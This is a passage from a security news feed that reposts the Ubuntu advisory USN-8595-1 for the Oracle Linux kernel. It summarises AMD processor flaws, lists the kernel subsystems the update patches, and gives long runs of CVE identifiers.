CVE-2026-46215, CVE-2026-46216, CVE-2026-46218, CVE-2026-46219,
CVE-2026-46220, CVE-2026-46221, CVE-2026-46222, CVE-2026-46223,
CVE-2026-46224, CVE-2026-46225, CVE-2026-46226, CVE-2026-46227,
CVE-2026-46228, CVE-2026-46229, CVE-2026-46230, CVE-2026-46231,
CVE-2026-46232, CVE-2026-46233, CVE-2026-46234, CVE-2026-46235,
CVE-2026-46236, CVE-2026-46238, CVE-2026-46239, CVE-2026-46240,
CVE-2026-46241, CVE-2026-46242, CVE-2026-46243, CVE-2026-46244,
CVE-2026-46273, CVE-2026-46274, CVE-2026-46275, CVE-2026-46276,
CVE-2026-46277, CVE-2026-46278, CVE-2026-46279, CVE-2026-46280,
CVE-2026-46281, CVE-2026-46282, CVE-2026-46283, CVE-2026-46284,
CVE-2026-46285, CVE-2026-46286, CVE-2026-46287, CVE-2026-46288,
CVE-2026-46289, CVE-2026-46290, CVE-2026-46291, CVE-2026-46292,
CVE-2026-46293, CVE-2026-46294, CVE-2026-46295, CVE-2026-46296,
CVE-2026-46297, CVE-2026-46298, CVE-2026-46299, CVE-2026-46301,
CVE-2026-46302, CVE-2026-46303, CVE-2026-46304, CVE-2026-46305,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46308, CVE-2026-46309,
CVE-2026-46310, CVE-2026-46311, CVE-2026-46312, CVE-2026-46313,
CVE-2026-46314, CVE-2026-46315, CVE-2026-46316, CVE-2026-46317,
CVE-2026-46318, CVE-2026-46319, CVE-2026-46320, CVE-2026-46321,
CVE-2026-46322, CVE-2026-46324, CVE-2026-46332, CVE-2026-52904,
CVE-2026-52905, CVE-2026-52906, CVE-2026-52907, CVE-2026-52911,
CVE-2026-52912, CVE-2026-52913, CVE-2026-52914, CVE-2026-52915,
CVE-2026-52916, CVE-2026-52918, CVE-2026-52919, CVE-2026-52920,
CVE-2026-52921, CVE-2026-52922, CVE-2026-52923, CVE-2026-52925,
CVE-2026-52926, CVE-2026-52927, CVE-2026-52928, CVE-2026-52931,
CVE-2026-52932, CVE-2026-52933, CVE-2026-52934, CVE-2026-52936,
CVE-2026-52937, CVE-2026-52941, CVE-2026-52943, CVE-2026-52944,
CVE-2026-52949, CVE-2026-52950, CVE-2026-52951, CVE-2026-52952,
CVE-2026-52953, CVE-2026-52954, CVE-2026-52955, CVE-2026-52956,
CVE-2026-52957, CVE-2026-52958, CVE-2026-52959, CVE-2026-52960,
CVE-2026-52961, CVE-2026-52962, CVE-2026-52963, CVE-2026-52964,
CVE-2026-52965, CVE-2026-52967, CVE-2026-52968, CVE-2026-52969,
CVE-2026-52970, CVE-2026-52971, CVE-2026-52973, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52976, CVE-2026-52977, CVE-2026-52978,
CVE-2026-52979, CVE-2026-52980, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52983, CVE-2026-52984, CVE-2026-52985, CVE-2026-52986,
CVE-2026-52987, CVE-2026-52988, CVE-2026-52989, CVE-2026-52990,
CVE-2026-52991, CVE-2026-52992, CVE-2026-52993, CVE-2026-52994,
CVE-2026-52995, CVE-2026-52996, CVE-2026-52997, CVE-2026-52998,
CVE-2026-52999, CVE-2026-53000, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53005, CVE-2026-53006,
CVE-2026-53007, CVE-2026-53008, CVE-2026-53009, CVE-2026-53010,
CVE-2026-53011, CVE-2026-53012, CVE-2026-53013, CVE-2026-53014,
CVE-2026-53015, CVE-2026-53016, CVE-2026-53017, CVE-2026-53018,
CVE-2026-53019, CVE-2026-53020, CVE-2026-53021, CVE-2026-53022,
CVE-2026-53023, CVE-2026-53024, CVE-2026-53025, CVE-2026-53026,
CVE-2026-53027, CVE-2026-53028, CVE-2026-53029, CVE-2026-53030,
CVE-2026-53031, CVE-2026-53032, CVE-2026-53033, CVE-2026-53034,
CVE-2026-53035, CVE-2026-53036, CVE-2026-53037, CVE-2026-53038,
CVE-2026-53039, CVE-2026-53040, CVE-2026-53041, CVE-2026-53042,
CVE-2026-53043, CVE-2026-53044, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53051, CVE-2026-53052, CVE-2026-53053, CVE-2026-53054,
CVE-2026-53055, CVE-2026-53056, CVE-2026-53057, CVE-2026-53058,
CVE-2026-53059, CVE-2026-53060, CVE-2026-53061, CVE-2026-53062,
CVE-2026-53063, CVE-2026-53064, CVE-2026-53065, CVE-2026-53066,
CVE-2026-53067, CVE-2026-53068, CVE-2026-53069, CVE-2026-53070,
CVE-2026-53071, CVE-2026-53072, CVE-2026-53073, CVE-2026-53074,
CVE-2026-53075, CVE-2026-53076, CVE-2026-53077, CVE-2026-53078,
CVE-2026-53079, CVE-2026-53080, CVE-2026-53081, CVE-2026-53082,
CVE-2026-53083, CVE-2026-53084, CVE-2026-53085, CVE-2026-53086,
CVE-2026-53087, CVE-2026-53088, CVE-2026-53089, CVE-2026-53090,
CVE-2026-53091, CVE-2026-53092, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53095, CVE-2026-53096, CVE-2026-53097, CVE-2026-53098,
CVE-2026-53099, CVE-2026-53100, CVE-2026-53101, CVE-2026-53102,
CVE-2026-53103, CVE-2026-53104, CVE-2026-53105, CVE-2026-53106,
CVE-2026-53107, CVE-2026-53108, CVE-2026-53109, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53113, CVE-2026-53114,
CVE-2026-53115, CVE-2026-53116, CVE-2026-53117, CVE-2026-53118,
CVE-2026-53119, CVE-2026-53120, CVE-2026-53121, CVE-2026-53122,
CVE-2026-53123, CVE-2026-53124, CVE-2026-53125, CVE-2026-53126,
CVE-2026-53127, CVE-2026-53128, CVE-2026-53129, CVE-2026-53130,
CVE-2026-53174, CVE-2026-53277, CVE-2026-53278, CVE-2026-53279,
CVE-2026-53280, CVE-2026-53281, CVE-2026-53282, CVE-2026-53283,
CVE-2026-53284, CVE-2026-53285, CVE-2026-53286, CVE-2026-53287,
CVE-2026-53288, CVE-2026-53289, CVE-2026-53290, CVE-2026-53291,
CVE-2026-53292, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53297, CVE-2026-53298, CVE-2026-53299,
CVE-2026-53300, CVE-2026-53301, CVE-2026-53302, CVE-2026-53303,
CVE-2026-53304, CVE-2026-53305, CVE-2026-53306, CVE-2026-53307,
CVE-2026-53308, CVE-2026-53309, CVE-2026-53310, CVE-2026-53311,
CVE-2026-53312, CVE-2026-53313, CVE-2026-53314, CVE-2026-53315,
CVE-2026-53316, CVE-2026-53317, CVE-2026-53318, CVE-2026-53319,
CVE-2026-53320, CVE-2026-53321, CVE-2026-53322, CVE-2026-53323,
CVE-2026-53324, CVE-2026-53357, CVE-2026-53358, CVE-2026-53360,
CVE-2026-53364, CVE-2026-53365, CVE-2026-53367, CVE-2026-53368,
CVE-2026-53369, CVE-2026-53370, CVE-2026-53371, CVE-2026-53372,
CVE-2026-53373, CVE-2026-53374, CVE-2026-53375, CVE-2026-53376,
CVE-2026-53377, CVE-2026-53378, CVE-2026-53379, CVE-2026-53380,
CVE-2026-63837, CVE-2026-63838, CVE-2026-63839, CVE-2026-63840,
CVE-2026-63841, CVE-2026-63842, CVE-2026-63843, CVE-2026-63844,
CVE-2026-63845, CVE-2026-63846, CVE-2026-63847, CVE-2026-63848,
CVE-2026-63849, CVE-2026-63850, CVE-2026-63851, CVE-2026-63852,
CVE-2026-63853, CVE-2026-63854, CVE-2026-63855, CVE-2026-63856,
CVE-2026-63857, CVE-2026-63858, CVE-2026-63859, CVE-2026-63860,
CVE-2026-63861, CVE-2026-63862, CVE-2026-63863, CVE-2026-63864,
CVE-2026-63865, CVE-2026-63866, CVE-2026-63875, CVE-2026-63876,
CVE-2026-63877, CVE-2026-63878, CVE-2026-63879, CVE-2026-63880,
CVE-2026-63881, CVE-2026-63882, CVE-2026-63883, CVE-2026-63884,
CVE-2026-63886, CVE-2026-63887, CVE-2026-63888, CVE-2026-63889,
CVE-2026-63890, CVE-2026-63891, CVE-2026-63892, CVE-2026-63893,
CVE-2026-63894, CVE-2026-63895, CVE-2026-63896, CVE-2026-63897,
CVE-2026-63898, CVE-2026-63899, CVE-2026-63900, CVE-2026-63901,
CVE-2026-63902, CVE-2026-63903, CVE-2026-63904, CVE-2026-63905,
CVE-2026-63906, CVE-2026-63907, CVE-2026-63908, CVE-2026-63910,
CVE-2026-63911, CVE-2026-63912, CVE-2026-63913, CVE-2026-63914,
CVE-2026-63915, CVE-2026-63916, CVE-2026-63917, CVE-2026-63918,
CVE-2026-63919, CVE-2026-63920, CVE-2026-63921, CVE-2026-63922,
CVE-2026-63923, CVE-2026-63924, CVE-2026-63925, CVE-2026-63926,
CVE-2026-63927, CVE-2026-63928, CVE-2026-63929, CVE-2026-63930,
CVE-2026-63931, CVE-2026-63932, CVE-2026-63933, CVE-2026-63934,
CVE-2026-63935, CVE-2026-63936, CVE-2026-63937, CVE-2026-63938,
CVE-2026-63939, CVE-2026-63940, CVE-2026-63941, CVE-2026-63942,
CVE-2026-63943, CVE-2026-63944, CVE-2026-63945, CVE-2026-63946,
CVE-2026-63947, CVE-2026-63948, CVE-2026-63949, CVE-2026-63950,
CVE-2026-63951, CVE-2026-63952, CVE-2026-63953, CVE-2026-63954,
CVE-2026-63955, CVE-2026-63956, CVE-2026-63957, CVE-2026-63958,
CVE-2026-63959, CVE-2026-63960, CVE-2026-63961, CVE-2026-63962,
CVE-2026-63963, CVE-2026-63964, CVE-2026-63965, CVE-2026-63966,
CVE-2026-63967, CVE-2026-63968, CVE-2026-63969, CVE-2026-63970,
CVE-2026-63971, CVE-2026-63972, CVE-2026-63973, CVE-2026-63974,
CVE-2026-63975, CVE-2026-63976, CVE-2026-63977, CVE-2026-63978,
CVE-2026-63979, CVE-2026-63980, CVE-2026-63981, CVE-2026-63982,
CVE-2026-63983, CVE-2026-63984, CVE-2026-63985, CVE-2026-63986,
CVE-2026-63987, CVE-2026-63988, CVE-2026-63989, CVE-2026-63990,
CVE-2026-63991, CVE-2026-63992, CVE-2026-63993, CVE-2026-63994,
CVE-2026-63995, CVE-2026-63996, CVE-2026-63997, CVE-2026-63998,
CVE-2026-63999, CVE-2026-64000, CVE-2026-64001, CVE-2026-64002,
CVE-2026-64003, CVE-2026-64004, CVE-2026-64005, CVE-2026-64006,
CVE-2026-64007, CVE-2026-64008, CVE-2026-64009, CVE-2026-64010,
CVE-2026-64011, CVE-2026-64012, CVE-2026-64013, CVE-2026-64014,
CVE-2026-64015, CVE-2026-64017, CVE-2026-64018, CVE-2026-64019,
CVE-2026-64020, CVE-2026-64021, CVE-2026-64022, CVE-2026-64023,
CVE-2026-64024, CVE-2026-64025, CVE-2026-64026, CVE-2026-64027,
CVE-2026-64029, CVE-2026-64030, CVE-2026-64031, CVE-2026-64032,
CVE-2026-64033, CVE-2026-64034, CVE-2026-64035, CVE-2026-64036,
CVE-2026-64037, CVE-2026-64038, CVE-2026-64039, CVE-2026-64040,
CVE-2026-64041, CVE-2026-64042, CVE-2026-64043, CVE-2026-64044,
CVE-2026-64045, CVE-2026-64046, CVE-2026-64047, CVE-2026-64048,
CVE-2026-64049, CVE-2026-64050, CVE-2026-64051, CVE-2026-64052,
CVE-2026-64053, CVE-2026-64054, CVE-2026-64055, CVE-2026-64056,
CVE-2026-64057, CVE-2026-64058, CVE-2026-64059, CVE-2026-64060,
CVE-2026-64061, CVE-2026-64062, CVE-2026-64063, CVE-2026-64064,
CVE-2026-64065, CVE-2026-64066, CVE-2026-64067, CVE-2026-64068,
CVE-2026-64069, CVE-2026-64070, CVE-2026-64071, CVE-2026-64072,
CVE-2026-64073, CVE-2026-64074, CVE-2026-64075, CVE-2026-64076,
CVE-2026-64077, CVE-2026-64078, CVE-2026-64079, CVE-2026-64080,
CVE-2026-64081, CVE-2026-64082, CVE-2026-64083, CVE-2026-64084,
CVE-2026-64085, CVE-2026-64086, CVE-2026-64087, CVE-2026-64088,
CVE-2026-64089, CVE-2026-64090, CVE-2026-64091, CVE-2026-64093,
CVE-2026-64094, CVE-2026-64095, CVE-2026-64096, CVE-2026-64097,
CVE-2026-64098, CVE-2026-64099, CVE-2026-64100, CVE-2026-64101,
CVE-2026-64102, CVE-2026-64103, CVE-2026-64104, CVE-2026-64105,
CVE-2026-64106, CVE-2026-64107, CVE-2026-64108, CVE-2026-64109,
CVE-2026-64110, CVE-2026-64111, CVE-2026-64112, CVE-2026-64113,
CVE-2026-64114, CVE-2026-64115, CVE-2026-64116, CVE-2026-64117,
CVE-2026-64118, CVE-2026-64119, CVE-2026-64120, CVE-2026-64121,
CVE-2026-64122, CVE-2026-64123, CVE-2026-64124, CVE-2026-64125,
CVE-2026-64126, CVE-2026-64127, CVE-2026-64128, CVE-2026-64129,
CVE-2026-64130, CVE-2026-64131, CVE-2026-64132, CVE-2026-64133,
CVE-2026-64134, CVE-2026-64135, CVE-2026-64136, CVE-2026-64137,
CVE-2026-64138, CVE-2026-64140, CVE-2026-64141, CVE-2026-64142,
CVE-2026-64143, CVE-2026-64144, CVE-2026-64145, CVE-2026-64146,
CVE-2026-64147, CVE-2026-64148, CVE-2026-64149, CVE-2026-64150,
CVE-2026-64151, CVE-2026-64152, CVE-2026-64153, CVE-2026-64154,
CVE-2026-64155, CVE-2026-64156, CVE-2026-64157, CVE-2026-64158,
CVE-2026-64159, CVE-2026-64160, CVE-2026-64161, CVE-2026-64162,
CVE-2026-64163, CVE-2026-64164, CVE-2026-64165, CVE-2026-64166,
CVE-2026-64167, CVE-2026-64168, CVE-2026-64169, CVE-2026-64170,
CVE-2026-64171, CVE-2026-64172, CVE-2026-64173, CVE-2026-64174,
CVE-2026-64175, CVE-2026-64176, CVE-2026-64177, CVE-2026-64178,
CVE-2026-64179, CVE-2026-64180, CVE-2026-64181, CVE-2026-64182,
CVE-2026-64183, CVE-2026-64184, CVE-2026-64185, CVE-2026-64186)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8595-1: Linux kernel (Oracle) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3688352/unix-server/usn-8595-1-linux-kernel-oracle-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688352/unix-server/usn-8595-1-linux-kernel-oracle-vulnerabilities/</guid>
<pubDate>Thu, 23 Jul 2026 10:20:43 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23207, CVE-2026-23226, CVE-2026-23227, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23253, CVE-2026-23255,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23279, CVE-2026-23281, CVE-2026-23284, CVE-2026-23285,
CVE-2026-23286, CVE-2026-23287, CVE-2026-23289, CVE-2026-23290,
CVE-2026-23291, CVE-2026-23292, CVE-2026-23293, CVE-2026-23296,
CVE-2026-23298, CVE-2026-23300, CVE-2026-23302, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23306, CVE-2026-23307, CVE-2026-23308,
CVE-2026-23310, CVE-2026-23312, CVE-2026-23313, CVE-2026-23315,
CVE-2026-23317, CVE-2026-23318, CVE-2026-23319, CVE-2026-23321,
CVE-2026-23324, CVE-2026-23325, CVE-2026-23330, CVE-2026-23334,
CVE-2026-23335, CVE-2026-23336, CVE-2026-23339, CVE-2026-23340,
CVE-2026-23343, CVE-2026-23347, CVE-2026-23352, CVE-2026-23356,
CVE-2026-23357, CVE-2026-23359, CVE-2026-23360, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23412,
CVE-2026-23413, CVE-2026-23414, CVE-2026-23418, CVE-2026-23419,
CVE-2026-23420, CVE-2026-23426, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23452, CVE-2026-23454, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31403, CVE-2026-31405, CVE-2026-31407, CVE-2026-31408,
CVE-2026-31409, CVE-2026-31412, CVE-2026-31413, CVE-2026-31414,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31438, CVE-2026-31439, CVE-2026-31440, CVE-2026-31441,
CVE-2026-31446, CVE-2026-31447, CVE-2026-31449, CVE-2026-31450,
CVE-2026-31451, CVE-2026-31452, CVE-2026-31453, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31458, CVE-2026-31464, CVE-2026-31466,
CVE-2026-31467, CVE-2026-31469, CVE-2026-31470, CVE-2026-31473,
CVE-2026-31474, CVE-2026-31476, CVE-2026-31477, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31507, CVE-2026-31508, CVE-2026-31509,
CVE-2026-31510, CVE-2026-31511, CVE-2026-31512, CVE-2026-31515,
CVE-2026-31516, CVE-2026-31518, CVE-2026-31519, CVE-2026-31520,
CVE-2026-31521, CVE-2026-31522, CVE-2026-31523, CVE-2026-31524,
CVE-2026-31525, CVE-2026-31527, CVE-2026-31528, CVE-2026-31530,
CVE-2026-31532, CVE-2026-31540, CVE-2026-31542, CVE-2026-31545,
CVE-2026-31546, CVE-2026-31548, CVE-2026-31549, CVE-2026-31550,
CVE-2026-31551, CVE-2026-31552, CVE-2026-31554, CVE-2026-31555,
CVE-2026-31556, CVE-2026-31557, CVE-2026-31563, CVE-2026-31565,
CVE-2026-31566, CVE-2026-31570, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31580, CVE-2026-31581,
CVE-2026-31582, CVE-2026-31583, CVE-2026-31584, CVE-2026-31585,
CVE-2026-31586, CVE-2026-31587, CVE-2026-31588, CVE-2026-31590,
CVE-2026-31594, CVE-2026-31595, CVE-2026-31596, CVE-2026-31597,
CVE-2026-31598, CVE-2026-31599, CVE-2026-31602, CVE-2026-31603,
CVE-2026-31604, CVE-2026-31605, CVE-2026-31606, CVE-2026-31610,
CVE-2026-31611, CVE-2026-31612, CVE-2026-31613, CVE-2026-31615,
CVE-2026-31616, CVE-2026-31617, CVE-2026-31618, CVE-2026-31619,
CVE-2026-31622, CVE-2026-31623, CVE-2026-31624, CVE-2026-31625,
CVE-2026-31626, CVE-2026-31627, CVE-2026-31628, CVE-2026-31629,
CVE-2026-31634, CVE-2026-31638, CVE-2026-31639, CVE-2026-31642,
CVE-2026-31645, CVE-2026-31646, CVE-2026-31648, CVE-2026-31651,
CVE-2026-31655, CVE-2026-31656, CVE-2026-31658, CVE-2026-31660,
CVE-2026-31661, CVE-2026-31662, CVE-2026-31664, CVE-2026-31665,
CVE-2026-31667, CVE-2026-31670, CVE-2026-31671, CVE-2026-31672,
CVE-2026-31673, CVE-2026-31674, CVE-2026-31675, CVE-2026-31677,
CVE-2026-31678, CVE-2026-31679, CVE-2026-31680, CVE-2026-31681,
CVE-2026-31683, CVE-2026-31684, CVE-2026-31686, CVE-2026-31689,
CVE-2026-31694, CVE-2026-31695, CVE-2026-31696, CVE-2026-31697,
CVE-2026-31698, CVE-2026-31699, CVE-2026-31700, CVE-2026-31701,
CVE-2026-31702, CVE-2026-31704, CVE-2026-31705, CVE-2026-31706,
CVE-2026-31707, CVE-2026-31708, CVE-2026-31709, CVE-2026-31711,
CVE-2026-31712, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31720, CVE-2026-31721, CVE-2026-31722, CVE-2026-31723,
CVE-2026-31724, CVE-2026-31725, CVE-2026-31726, CVE-2026-31728,
CVE-2026-31729, CVE-2026-31730, CVE-2026-31731, CVE-2026-31737,
CVE-2026-31738, CVE-2026-31740, CVE-2026-31741, CVE-2026-31747,
CVE-2026-31748, CVE-2026-31749, CVE-2026-31751, CVE-2026-31752,
CVE-2026-31754, CVE-2026-31755, CVE-2026-31756, CVE-2026-31758,
CVE-2026-31759, CVE-2026-31761, CVE-2026-31762, CVE-2026-31763,
CVE-2026-31767, CVE-2026-31768, CVE-2026-31770, CVE-2026-31772,
CVE-2026-31773, CVE-2026-31778, CVE-2026-31779, CVE-2026-31780,
CVE-2026-31781, CVE-2026-31788, CVE-2026-43007, CVE-2026-43012,
CVE-2026-43013, CVE-2026-43014, CVE-2026-43015, CVE-2026-43016,
CVE-2026-43017, CVE-2026-43018, CVE-2026-43019, CVE-2026-43020,
CVE-2026-43023, CVE-2026-43024, CVE-2026-43025, CVE-2026-43026,
CVE-2026-43027, CVE-2026-43028, CVE-2026-43030, CVE-2026-43032,
CVE-2026-43035, CVE-2026-43036, CVE-2026-43040, CVE-2026-43041,
CVE-2026-43043, CVE-2026-43044, CVE-2026-43046, CVE-2026-43047,
CVE-2026-43049, CVE-2026-43050, CVE-2026-43051, CVE-2026-43052,
CVE-2026-43054, CVE-2026-43056, CVE-2026-43057, CVE-2026-43058,
CVE-2026-43059, CVE-2026-43060, CVE-2026-43061, CVE-2026-43062,
CVE-2026-43064, CVE-2026-43065, CVE-2026-43066, CVE-2026-43068,
CVE-2026-43069, CVE-2026-43072, CVE-2026-43073, CVE-2026-43074,
CVE-2026-43075, CVE-2026-43076, CVE-2026-43079, CVE-2026-43080,
CVE-2026-43081, CVE-2026-43082, CVE-2026-43084, CVE-2026-43085,
CVE-2026-43086, CVE-2026-43088, CVE-2026-43089, CVE-2026-43091,
CVE-2026-43092, CVE-2026-43093, CVE-2026-43094, CVE-2026-43098,
